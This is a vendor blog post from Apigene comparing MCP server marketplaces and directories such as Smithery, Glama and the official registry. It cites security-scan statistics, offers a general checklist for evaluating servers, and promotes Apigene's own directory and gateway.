Apigene Logo
Back to Blog
insights

MCP Marketplace Guide: Find the Right Server (2026)

Apigene Team
10 min read
MCP Marketplace Guide: Find the Right Server (2026)

"Funny how there are actually gazillion of MCP registries in the wild. At this point every developer is going to have its own."

That Reddit comment captures the state of MCP server discovery in 2026. There are at least a dozen active mcp marketplace platforms, directories, and registries competing for attention. Some track 8,000+ entries. Others curate 30 verified ones. A few charge for API access. Most are free but give you zero information about whether a server is safe, maintained, or compatible with your client.

The result: developers burn hours hunting through GitHub repos, Discord channels, and competing directories to find a single server that works. One developer said it directly: "Flipping thru github issues and discords for basic install commands. Sucked up hours."

This guide compares every major mcp marketplace, explains what separates a useful mcp directory from a search engine over GitHub, and helps you pick the right one. The best directory isn't the biggest one. It's the one that tells you which servers are safe to install and makes installation painless.

We analyzed 15 community threads with 200+ comments to identify what developers actually want from an mcp marketplace and where every current option falls short.

Key Takeaways

For busy teams evaluating MCP directories, here's what 15 community threads revealed:

  • Discovery is scattered across 10+ sources. Servers get published on npm, PyPI, GitHub, and multiple competing registries. No single mcp marketplace has everything.
  • Quantity without quality is useless. A directory listing 8,000 servers is only valuable if it tells you which ones are safe, maintained, and compatible with your client.
  • Security scanning is the top differentiator. 36.7% of public MCP servers have SSRF vulnerabilities. Directories that scan for this win trust. Directories that don't are just search engines over GitHub.
  • One-click install beats a bigger catalog. Developers consistently cite setup friction as the reason they abandon servers. The best mcp directory platforms pair listing with installation.

Why MCP Discovery Is Broken

The MCP ecosystem doesn't have a single canonical mcp marketplace. Servers get published across:

  • The official MCP Registry (registry.modelcontextprotocol.io)
  • npm and PyPI (JavaScript and Python package managers)
  • GitHub topics and awesome-lists (community-curated collections)
  • Dedicated directories (Apigene, Smithery, Glama, PulseMCP, mcp.so, mcpservers.org)
  • Product Hunt and Reddit (launch announcements and threads)

One developer built mcp-submit, a CLI that pushes your server to 10+ directories in a single command, because they were "tired of manually submitting to 10+ MCP directories every time I shipped a server." The fact that this tool exists tells you everything about how fragmented discovery is.

For consumers, this fragmentation creates three problems:

  1. You never know if you've found the best option. The same capability (web search, database access, file management) might have 5 different implementations across 3 different registries. An mcp store listing doesn't tell you which one is actually production-ready.
  2. Quality signals are missing. Most directories list servers without telling you if they're maintained, secure, or compatible with your client.
  3. Installation friction kills discovery. Finding a server is only half the battle. Getting it running with your specific client (Claude Desktop, Cursor, ChatGPT) requires digging through READMEs for config JSON that may or may not work.

What Makes an MCP Directory Actually Useful

Before comparing specific platforms, here's what the community says they want from an mcp marketplace. These criteria come directly from 15 threads of developer feedback:

Security Signals

This is the #1 ask. A scan of 8,000+ MCP servers revealed that 36.7% had SSRF vulnerabilities, 43% had unsafe command execution paths, and 41% of servers in the official registry had zero authentication. One developer warned: "the permission model is basically 'do you trust this server yes or no'. There's no sandboxing, no audit trail."

A useful mcp directory needs to tell you:

  • Has the server been security-scanned?
  • What vulnerabilities were found (if any)?
  • Does it require auth? What kind?
  • What permissions does it request?

Stop Building MCP Integrations From Scratch.

  • Any API, one line of code — connect to ChatGPT, Claude, and Cursor without writing custom MCP servers
  • Visual UI in the chat — render interactive components, not just text dumps. Charts, forms, dashboards.
  • 70% fewer tokens — dynamic tool loading and output compression so your agents stay fast and cheap
Browse All IntegrationsCreate Free Trial AccountBook a Demo with FounderYaniv Shani

Verification and Trust

The "multiple versions of the same tool" problem is real. Community members recommend sticking with "official ones" because forks and variants can introduce malicious changes. A useful mcp store verifies who published the server and whether the listing matches the actual codebase.

One thread's advice: "Treat any MCP marketplace like npm: only install from repos you trust and run it in a sandbox first."

Installation Readiness

Developers consistently rank "one-click install" as a deciding factor. The pain isn't just discovering a server. It's the gap between "found it" and "running it." A developer building an mcp directory put it this way: "No one is going to install random scripts anymore." Useful directories provide ready-to-paste configs for Claude Desktop, Cursor, VS Code, and other clients.

Quality and Freshness

Community feedback says directories need to surface:

  • Maintenance status (last commit date, issue response time)
  • Production readiness (works under load, has containerization)
  • Cold start performance (pip/npm downloads during startup)
  • Client compatibility matrix (which clients has it been tested with)

Without these signals, a directory is just "a search engine over GitHub," as one commenter put it.

MCP Marketplace Comparison

Here's how every major mcp marketplace and mcp directory stacks up as of March 2026.

Apigene MCP Directory

URL: apigene.ai/mcp/official

Listings: 251+ vendor-verified MCP servers

Key differentiators:

  • Security scanning. Every server is scanned against OWASP MCP guidelines. Vulnerability reports and security metadata are surfaced per listing. This is the feature that most other directories lack entirely.
  • Vendor verification. Servers are verified by the vendor or maintainer, not just scraped from a registry. This eliminates the "multiple versions of the same tool" confusion that plagues open registries.
  • One-click installation. Each server page includes ready-to-paste configuration for Claude Desktop, Cursor, VS Code, and other clients. No digging through READMEs.
  • Gateway integration. Servers install through Apigene's MCP gateway, which handles auth, transport translation, and credential isolation. You're not just discovering servers. You're deploying them safely.
  • Categorized browsing. Servers are organized by use case (dev tools, databases, productivity, CRM) with clear descriptions of what each one does.

Best for: Teams that want a curated, security-first mcp directory with install-ready configs. If you care more about quality than quantity, start here.

Smithery

URL: smithery.ai

Listings: 2,000+ servers

Key differentiators:

  • Large catalog scraped from multiple sources
  • Hosted server execution (runs servers for you)
  • Config generation for popular clients
  • SDK and CLI for programmatic server installation

Limitations:

  • Community reports of confusing duplicate listings
  • Multiple versions of the same server without clear guidance on which to pick
  • Limited security metadata per listing

Best for: Developers who want a broad catalog and don't mind doing their own security evaluation.

Glama

URL: glama.ai/mcp

Listings: 6,000+ servers

Key differentiators:

  • Free API for programmatic server browsing (the founder explicitly committed: "100% free and will remain this way")
  • Gateway product alongside the directory
  • Active community contributions

Limitations:

  • Quantity-focused. Discovery is harder when you're searching through thousands of unranked entries.
  • Limited per-server security data

Best for: Developers who want API access to browse servers programmatically or build custom discovery tools.

PulseMCP

URL: pulsemcp.com

Listings: 3,000+ servers

Key differentiators:

  • Focus on trending and newly published servers
  • Community engagement metrics
  • Regular roundup content

Limitations:

  • Less focus on security scanning
  • Discovery skews toward recency over production readiness

Best for: Keeping up with newly released servers and tracking community trends.

mcp.so

URL: mcp.so

Listings: 5,000+ servers

Key differentiators:

  • Clean, searchable interface
  • Category-based browsing
  • Active curation team

Limitations:

  • Primarily a listing platform without install automation
  • Limited security or quality signals per entry

Best for: Quick browsing when you know roughly what you're looking for.

mcpservers.org

URL: mcpservers.org

Listings: 4,000+ servers

Key differentiators:

  • Aggregates from npm, PyPI, and GitHub
  • Rankings based on popularity metrics
  • Free access

Limitations:

  • Popularity metrics can be gamed
  • Limited verification of listed servers

Best for: Finding popular servers based on community adoption metrics.

Explore 251+ MCP Integrations

Discover official and remote-only MCP servers from leading vendors. Connect AI agents to powerful tools and services.

GitHub
HubSpot
Airtable
Asana
Google Cloud
Apollo
Ahrefs
HuggingFace
Exa
Clay
+241
Browse All Integrations
251 Official ServersUpdated RegularlyVendor Verified

Official MCP Registry

URL: registry.modelcontextprotocol.io

Listings: 500+ servers

Key differentiators:

  • Maintained by the MCP project itself
  • Structured metadata (tools, clients, authors)
  • Canonical source for "official" servers

Limitations:

  • Smaller catalog than community directories
  • No security scanning
  • Limited install tooling
  • A community audit found 41% of listed servers have zero authentication

Best for: Finding servers that have been submitted through the official process. Good starting point, but don't assume "official registry" means "security vetted."

Cline MCP Marketplace

URL: Available within the Cline VS Code extension

Listings: Curated selection

Key differentiators:

  • Built directly into the Cline editor
  • Install without leaving your IDE
  • Curated for Cline compatibility

Limitations:

  • Only accessible through Cline
  • Limited to servers that work with Cline's configuration model

Best for: Cline users who want frictionless in-editor installation.

MCPMarket

URL: mcpmarket.com

Listings: 1,900+ servers

Key differentiators:

  • Security scanning for data exfiltration, obfuscated code, and excessive permissions
  • One-click install configs for multiple clients
  • Community reviews and ratings

Limitations:

  • Newer platform, still building trust
  • Smaller community than Smithery or Glama

Best for: Developers who prioritize security scanning but want a broader catalog than Apigene.

Expert Tip -- Yaniv Shani, Founder of Apigene

"An MCP marketplace that just lists servers is solving yesterday's problem. The real challenge isn't finding a server. It's knowing if it's safe, knowing it works with your client, and getting it running in 30 seconds instead of 30 minutes. That's why we built the Apigene directory as a gateway-integrated experience. You don't just discover servers. You deploy them with security, auth, and transport handled from the start."

MCP Marketplace Comparison Table

FeatureApigeneSmitheryGlamamcp.somcpservers.orgOfficial Registry
Listings251+ verified2,000+6,000+5,000+4,000+500+
Security scanningYes (OWASP)LimitedLimitedNoNoNo
Vendor verificationYesNoNoNoNoSubmission review
One-click installYesYesNoNoNoNo
Gateway integrationYesHosted executionYesNoNoNo
Free APIYesPaid tiersYes (free forever)NoNoNo
Client configsAll major clientsSelect clientsLimitedNoNoNo
Category browsingYesYesYesYesYesLimited

How to Evaluate Any MCP Marketplace

Regardless of which mcp directory you use, apply this evaluation framework before installing any server:

Step 1: Check Security Signals

Look for OWASP MCP compliance, vulnerability scan results, and auth requirements. If the directory doesn't show this data, check the server's GitHub repo for security docs. If there aren't any, proceed with extreme caution.

The mcp marketplace security landscape is sobering: 36.7% SSRF rate, 43% unsafe command execution, 9.2% critical findings. Don't assume "listed" means "safe."

Step 2: Verify the Publisher

Check if the server is published by the official vendor (like Stripe for the Stripe MCP server) or by a community contributor. Multiple forks of the same server can have very different security postures. Community advice: stick with official or well-starred forks.

Step 3: Check Maintenance

When was the last commit? Are issues being addressed? Is there a Docker image? One directory maintainer noted: "It's shocking how few people put effort into documentation and containerization. No one is going to install random scripts anymore."

Step 4: Test Client Compatibility

Not every server works with every client. Claude Desktop uses stdio, ChatGPT requires OAuth 2.1, Cursor has its own config format. A good mcp store tells you which clients the server supports. If it doesn't, you'll find out through trial and error.

Step 5: Sandbox First

Treat any mcp marketplace like npm. Run the server in an isolated environment before giving it access to production credentials. Check what network calls it makes. Check what file system access it requests.

The Directory Fatigue Problem

One of the clearest signals from our research is that developers are tired of mcp marketplace proliferation. "Building a marketplace for this is low hanging fruit... way too oversaturated right now," said one commenter. Another asked why they should use a dedicated directory when they could "ask Claude to do the work to pick one for me."

This fatigue is driving a few trends:

  1. Consolidation toward gateways. Developers increasingly want their mcp directory and their mcp deployment infrastructure in one place. Finding a server in one tab and configuring it in another is friction nobody wants.
  2. Agent-driven discovery. Some directories are building MCP server endpoints for their own catalogs, so AI agents can discover other servers programmatically. The Meyhem project indexed 7,500+ servers and exposed them as an MCP tool.
  3. CI/CD integration. Developers want to chain directory submissions into their release pipeline. Tools like mcp-submit automate publishing to 10+ directories from a single command.

The winners in this space will be the directories that go beyond listing. Discovery is a solved problem. Trust, security, and frictionless deployment are not.

How a Gateway Changes the Discovery Experience

The Apigene MCP gateway connects the mcp directory to the deployment layer. Here's what that means in practice:

  • Browse the directory, click install, and the server is live. No config files to edit, no JSON to paste, no environment variables to set.
  • Security is handled at the gateway layer. Even if an individual server has weak auth, the gateway enforces credential isolation, outbound URL restrictions, and tool-level access controls.
  • Transport is abstracted. You don't need to know if a server uses stdio, SSE, or Streamable HTTP. The gateway translates for your client automatically.
  • Updates flow through the gateway. When a server updates, you get the new version without reconfiguring. No more checking GitHub for breaking changes.

This approach addresses the community's #1 complaint: the gap between "found a server" and "server is running safely in my workflow." The best mcp marketplace is the one that closes that gap entirely.

Stop Building MCP Integrations From Scratch.

  • Any API, one line of code — connect to ChatGPT, Claude, and Cursor without writing custom MCP servers
  • Visual UI in the chat — render interactive components, not just text dumps. Charts, forms, dashboards.
  • 70% fewer tokens — dynamic tool loading and output compression so your agents stay fast and cheap
Browse All IntegrationsCreate Free Trial AccountBook a Demo with FounderYaniv Shani

Frequently Asked Questions

What is an MCP marketplace?

An MCP marketplace is a directory or platform where developers can discover, evaluate, and install MCP (Model Context Protocol) servers. These servers let AI agents connect to external tools like GitHub, Stripe, Slack, and databases. Marketplaces range from simple lists (like awesome-mcp-servers on GitHub) to full platforms with security scanning, verification, and one-click install (like Apigene).

Which MCP marketplace has the most servers?

Glama leads with 6,000+ listings, followed by mcp.so (5,000+), mcpservers.org (4,000+), and Smithery (2,000+). But quantity doesn't equal quality. Security scans of 8,000+ servers found that over a third have SSRF vulnerabilities. The Apigene directory takes a different approach with 251+ vendor-verified servers, each security-scanned against OWASP guidelines.

Are MCP servers from marketplaces safe to install?

Not automatically. A scan of 8,000+ public MCP servers found 36.7% had SSRF vulnerabilities, 43% had unsafe command execution paths, and 41% in the official registry had zero authentication. Always check for security scanning data, verify the publisher, and sandbox new servers before giving them production credentials. Directories with security scanning like Apigene reduce this risk significantly.

How do I install an MCP server from a marketplace?

It depends on the marketplace. Most require you to copy JSON configuration and paste it into your client's config file (claude_desktop_config.json for Claude Desktop, .cursor/mcp.json for Cursor). Platforms like Apigene offer one-click install that handles configuration automatically through their gateway. Some directories like Smithery also offer hosted execution.

What's the difference between the official MCP Registry and other marketplaces?

The official MCP Registry (registry.modelcontextprotocol.io) is maintained by the MCP project and lists ~500 servers that have been submitted through their process. Other marketplaces aggregate from the registry plus npm, PyPI, GitHub, and community sources. The official registry has basic submission review but no security scanning. Community marketplaces vary widely in their verification and security practices.

Can I submit my own MCP server to marketplaces?

Yes. Most marketplaces accept community submissions. The official MCP Registry accepts PRs. Smithery, Glama, and others have submission forms. If you want to submit to multiple directories at once, the open-source tool mcp-submit automates the process for 10+ directories in a single command. For the Apigene directory, servers go through a vendor verification process.

#mcp#marketplace#directory#mcp-server#ai-agents
Share